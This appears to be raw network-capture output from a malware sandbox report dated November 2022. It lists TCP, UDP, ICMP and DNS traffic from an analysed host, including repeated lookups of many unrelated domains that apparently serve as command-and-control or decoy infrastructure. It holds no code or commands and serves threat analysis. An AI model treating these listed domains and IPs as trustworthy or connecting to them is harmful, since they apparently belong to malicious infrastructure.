                                                                                                                        Nov 29, 2022 10:35:45.141190052 CET8049738198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:45.141372919 CET4973880192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:45.158920050 CET4973880192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:45.329163074 CET8049738198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:45.448339939 CET8049738198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:45.448385954 CET8049738198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:45.448518038 CET4973880192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:46.215157032 CET4973880192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:47.225840092 CET4973980192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:47.395339966 CET8049739198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:47.395627022 CET4973980192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:47.395817995 CET4973980192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:47.564899921 CET8049739198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:47.697973967 CET8049739198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:47.698044062 CET8049739198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:47.698256969 CET4973980192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:47.698483944 CET4973980192.168.2.5198.54.121.81
                                                                                                                        Nov 29, 2022 10:35:47.867541075 CET8049739198.54.121.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:52.784545898 CET4974080192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:52.809432030 CET8049740178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:52.809592009 CET4974080192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:52.809756041 CET4974080192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:52.834839106 CET8049740178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:52.836494923 CET8049740178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:52.836544991 CET8049740178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:52.836672068 CET4974080192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:53.818114996 CET4974080192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:54.834342957 CET4974180192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:54.859028101 CET8049741178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:54.859528065 CET4974180192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:54.859528065 CET4974180192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:54.883879900 CET8049741178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:54.885195017 CET8049741178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:54.885217905 CET8049741178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:54.885317087 CET4974180192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:55.865084887 CET4974180192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:56.881469011 CET4974280192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:56.905863047 CET8049742178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:56.906107903 CET4974280192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:56.906430960 CET4974280192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:56.931519985 CET8049742178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:56.932915926 CET8049742178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:56.932964087 CET8049742178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:56.933249950 CET4974280192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:56.933624983 CET4974280192.168.2.5178.208.83.20
                                                                                                                        Nov 29, 2022 10:35:56.957623959 CET8049742178.208.83.20192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:02.091444016 CET4974480192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:02.127363920 CET804974462.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:02.127517939 CET4974480192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:02.127837896 CET4974480192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:02.163589001 CET804974462.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:02.163863897 CET804974462.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:02.163906097 CET804974462.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:02.163943052 CET804974462.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:02.163975954 CET804974462.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:02.164004087 CET804974462.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:02.164032936 CET4974480192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:02.164084911 CET4974480192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:03.617518902 CET4974480192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:04.636075020 CET4974580192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:04.672916889 CET804974562.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:04.673017979 CET4974580192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:04.673228979 CET4974580192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:04.709863901 CET804974562.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:04.710150003 CET804974562.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:04.710190058 CET804974562.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:04.710221052 CET804974562.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:04.710248947 CET804974562.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:04.710269928 CET804974562.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:04.710295916 CET4974580192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:04.710339069 CET4974580192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:04.710349083 CET4974580192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:05.678342104 CET4974580192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:06.696595907 CET4974680192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:06.733385086 CET804974662.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:06.733640909 CET4974680192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:06.734752893 CET4974680192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:06.771297932 CET804974662.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:06.771914959 CET804974662.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:06.771943092 CET804974662.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:06.771962881 CET804974662.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:06.771980047 CET804974662.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:06.771994114 CET804974662.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:06.772138119 CET4974680192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:06.772205114 CET4974680192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:06.772413969 CET4974680192.168.2.562.233.121.61
                                                                                                                        Nov 29, 2022 10:36:06.809068918 CET804974662.233.121.61192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:12.028294086 CET4974780192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:12.236776114 CET8049747107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:12.236936092 CET4974780192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:12.237135887 CET4974780192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:12.445970058 CET8049747107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:12.446057081 CET8049747107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:12.446124077 CET8049747107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:12.447468996 CET4974780192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:13.241811037 CET4974780192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:14.257744074 CET4974880192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:14.466773033 CET8049748107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:14.466901064 CET4974880192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:14.467072964 CET4974880192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:14.674309969 CET8049748107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:14.674563885 CET8049748107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:14.674587965 CET8049748107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:14.674652100 CET4974880192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:15.476547003 CET4974880192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:16.492338896 CET4974980192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:16.701170921 CET8049749107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:16.701422930 CET4974980192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:16.701500893 CET4974980192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:16.908899069 CET8049749107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:16.908967018 CET8049749107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:16.909008980 CET8049749107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:16.909177065 CET4974980192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:16.929903984 CET4974980192.168.2.5107.148.15.81
                                                                                                                        Nov 29, 2022 10:36:17.137401104 CET8049749107.148.15.81192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:23.810903072 CET4975080192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:23.979249954 CET804975038.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:23.979490995 CET4975080192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:24.008307934 CET4975080192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:24.176851034 CET804975038.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:24.176883936 CET804975038.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:24.176950932 CET804975038.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:24.177079916 CET4975080192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:25.023910046 CET4975080192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:26.040999889 CET4975180192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:26.209496975 CET804975138.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:26.209770918 CET4975180192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:26.209897995 CET4975180192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:26.378118038 CET804975138.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:26.378156900 CET804975138.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:26.378174067 CET804975138.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:26.378391027 CET4975180192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:27.211445093 CET4975180192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:28.228013992 CET4975280192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:28.397489071 CET804975238.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:28.398586035 CET4975280192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:28.398721933 CET4975280192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:28.568411112 CET804975238.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:28.568582058 CET804975238.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:28.568619013 CET804975238.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:28.568922043 CET4975280192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:28.573585987 CET4975280192.168.2.538.163.214.169
                                                                                                                        Nov 29, 2022 10:36:28.743585110 CET804975238.163.214.169192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:33.630836010 CET4975380192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:33.798810959 CET804975323.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:33.799091101 CET4975380192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:33.799280882 CET4975380192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:33.967010975 CET804975323.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:33.969059944 CET804975323.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:33.969115019 CET804975323.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:33.969141960 CET804975323.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:33.969264984 CET4975380192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:33.969264984 CET4975380192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:34.815381050 CET4975380192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:35.822463989 CET4975480192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:35.984054089 CET804975423.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:35.984349012 CET4975480192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:35.984519005 CET4975480192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:36.145868063 CET804975423.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:36.146116972 CET804975423.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:36.146146059 CET804975423.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:36.146167040 CET804975423.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:36.146246910 CET4975480192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:36.999412060 CET4975480192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:38.010133982 CET4975580192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:38.175719023 CET804975523.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:38.175955057 CET4975580192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:38.176141977 CET4975580192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:38.341531038 CET804975523.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:38.341603041 CET804975523.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:38.341626883 CET804975523.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:38.341648102 CET804975523.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:38.341803074 CET4975580192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:38.341857910 CET4975580192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:38.342514038 CET4975580192.168.2.523.111.12.177
                                                                                                                        Nov 29, 2022 10:36:38.507798910 CET804975523.111.12.177192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:43.400815010 CET4975680192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:43.527986050 CET804975674.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:43.528331041 CET4975680192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:43.528492928 CET4975680192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:43.655534029 CET804975674.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:43.660981894 CET804975674.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:43.661021948 CET804975674.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:43.661086082 CET4975680192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:44.541270018 CET4975680192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:45.565318108 CET4975780192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:45.692418098 CET804975774.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:45.692681074 CET4975780192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:45.692920923 CET4975780192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:45.819844961 CET804975774.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:45.825123072 CET804975774.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:45.825166941 CET804975774.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:45.825282097 CET4975780192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:46.705300093 CET4975780192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:47.714406967 CET4975980192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:47.841259003 CET804975974.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:47.844337940 CET4975980192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:47.844528913 CET4975980192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:47.970735073 CET804975974.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:47.974574089 CET804975974.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:47.974608898 CET804975974.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:47.974626064 CET804975974.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:47.974826097 CET4975980192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:47.975109100 CET4975980192.168.2.574.208.236.214
                                                                                                                        Nov 29, 2022 10:36:48.101437092 CET804975974.208.236.214192.168.2.5
                                                                                                                        Nov 29, 2022 10:37:06.274184942 CET4976080192.168.2.5188.114.97.3
                                                                                                                        Nov 29, 2022 10:37:06.291245937 CET8049760188.114.97.3192.168.2.5
                                                                                                                        Nov 29, 2022 10:37:06.291436911 CET4976080192.168.2.5188.114.97.3
                                                                                                                        Nov 29, 2022 10:37:06.291654110 CET4976080192.168.2.5188.114.97.3
                                                                                                                        Nov 29, 2022 10:37:06.308465958 CET8049760188.114.97.3192.168.2.5
                                                                                                                        Nov 29, 2022 10:37:06.448113918 CET8049760188.114.97.3192.168.2.5
                                                                                                                        Nov 29, 2022 10:37:06.558572054 CET4976080192.168.2.5188.114.97.3
                                                                                                                        Nov 29, 2022 10:37:06.672503948 CET8049760188.114.97.3192.168.2.5
                                                                                                                        Nov 29, 2022 10:37:06.672657013 CET4976080192.168.2.5188.114.97.3
                                                                                                                        Nov 29, 2022 10:37:06.672734976 CET4976080192.168.2.5188.114.97.3
                                                                                                                        Nov 29, 2022 10:37:06.690037966 CET8049760188.114.97.3192.168.2.5

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 29, 2022 10:34:27.014851093 CET6344653192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:34:27.040199995 CET53634468.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:32.821219921 CET5503953192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:34:32.943109035 CET53550398.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:42.643572092 CET6097553192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:34:42.667421103 CET53609758.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:34:52.171785116 CET5506853192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:34:52.190450907 CET53550688.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:01.977390051 CET5668253192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:35:02.101298094 CET53566828.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:11.693732977 CET6265953192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:35:11.952652931 CET53626598.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:21.715904951 CET5858153192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:35:21.738689899 CET53585818.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:31.672270060 CET6551353192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:35:32.116449118 CET53655138.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:42.613173008 CET5668753192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:35:42.635181904 CET53566878.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:35:52.713239908 CET6441953192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:35:52.783279896 CET53644198.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:01.994003057 CET6134453192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:36:02.056188107 CET53613448.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:11.792120934 CET5397253192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:36:12.027338028 CET53539728.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:22.629139900 CET6493253192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:36:23.740036964 CET6493253192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:36:23.798295975 CET53649328.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:23.905383110 CET53649328.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:33.592092037 CET5847253192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:36:33.618837118 CET53584728.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:43.376907110 CET6017753192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:36:43.399647951 CET53601778.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:52.984909058 CET6001953192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:36:53.005125046 CET53600198.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:54.015237093 CET5090253192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:36:54.035623074 CET53509028.8.8.8192.168.2.5
                                                                                                                        Nov 29, 2022 10:36:55.045731068 CET5382353192.168.2.58.8.8.8
                                                                                                                        Nov 29, 2022 10:36:55.074374914 CET53538238.8.8.8192.168.2.5

                                                                                                                        ICMP Packets

                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                        Nov 29, 2022 10:36:23.905508995 CET192.168.2.58.8.8.8d009(Port unreachable)Destination Unreachable

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Nov 29, 2022 10:34:27.014851093 CET192.168.2.58.8.8.80x32a7Standard query (0)www.oonrreward.xyzA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:34:32.821219921 CET192.168.2.58.8.8.80x1ae6Standard query (0)www.gmrsnodes.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:34:42.643572092 CET192.168.2.58.8.8.80xa69fStandard query (0)www.dailyheraldresearch.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:34:52.171785116 CET192.168.2.58.8.8.80x1a48Standard query (0)www.publickit.websiteA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:01.977390051 CET192.168.2.58.8.8.80xa16dStandard query (0)www.lee-perez.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:11.693732977 CET192.168.2.58.8.8.80x3e57Standard query (0)www.frwqc.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:21.715904951 CET192.168.2.58.8.8.80x7dafStandard query (0)www.tommy57.shopA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:31.672270060 CET192.168.2.58.8.8.80x2c4aStandard query (0)www.700544.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:42.613173008 CET192.168.2.58.8.8.80x57e8Standard query (0)www.porggiret.siteA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:52.713239908 CET192.168.2.58.8.8.80x9426Standard query (0)www.tobewell.storeA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:01.994003057 CET192.168.2.58.8.8.80xbe35Standard query (0)www.new-thinking.digitalA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:11.792120934 CET192.168.2.58.8.8.80x2b64Standard query (0)www.ybkos.linkA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:22.629139900 CET192.168.2.58.8.8.80x906eStandard query (0)www.bookmygennie.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:23.740036964 CET192.168.2.58.8.8.80x906eStandard query (0)www.bookmygennie.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:33.592092037 CET192.168.2.58.8.8.80x92e2Standard query (0)www.amspustaka.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:43.376907110 CET192.168.2.58.8.8.80x5112Standard query (0)www.spirituallyzen.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:52.984909058 CET192.168.2.58.8.8.80x10fdStandard query (0)www.davidemarone.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:54.015237093 CET192.168.2.58.8.8.80xdf56Standard query (0)www.davidemarone.comA (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:36:55.045731068 CET192.168.2.58.8.8.80xa18fStandard query (0)www.davidemarone.comA (IP address)IN (0x0001)false

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Nov 29, 2022 10:34:27.040199995 CET8.8.8.8192.168.2.50x32a7No error (0)www.oonrreward.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:34:27.040199995 CET8.8.8.8192.168.2.50x32a7No error (0)www.oonrreward.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:34:32.943109035 CET8.8.8.8192.168.2.50x1ae6No error (0)www.gmrsnodes.comgmrsnodes.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:34:32.943109035 CET8.8.8.8192.168.2.50x1ae6No error (0)gmrsnodes.com192.185.90.105A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:34:42.667421103 CET8.8.8.8192.168.2.50xa69fNo error (0)www.dailyheraldresearch.com172.67.214.243A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:34:42.667421103 CET8.8.8.8192.168.2.50xa69fNo error (0)www.dailyheraldresearch.com104.21.83.59A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:34:52.190450907 CET8.8.8.8192.168.2.50x1a48No error (0)www.publickit.websitepublickit.websiteCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:34:52.190450907 CET8.8.8.8192.168.2.50x1a48No error (0)publickit.website206.83.40.92A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:02.101298094 CET8.8.8.8192.168.2.50xa16dNo error (0)www.lee-perez.com216.40.34.41A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:11.952652931 CET8.8.8.8192.168.2.50x3e57No error (0)www.frwqc.com38.40.166.195A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:21.738689899 CET8.8.8.8192.168.2.50x7dafNo error (0)www.tommy57.shop74.208.236.65A (IP address)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:32.116449118 CET8.8.8.8192.168.2.50x2c4aNo error (0)www.700544.compp.3105.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 29, 2022 10:35:32.116449118 CET8.8.8.8192.168.2.50x2c4aNo error (0)pp.3105.net93.179.127.27A (IP address)IN (0x0001)false
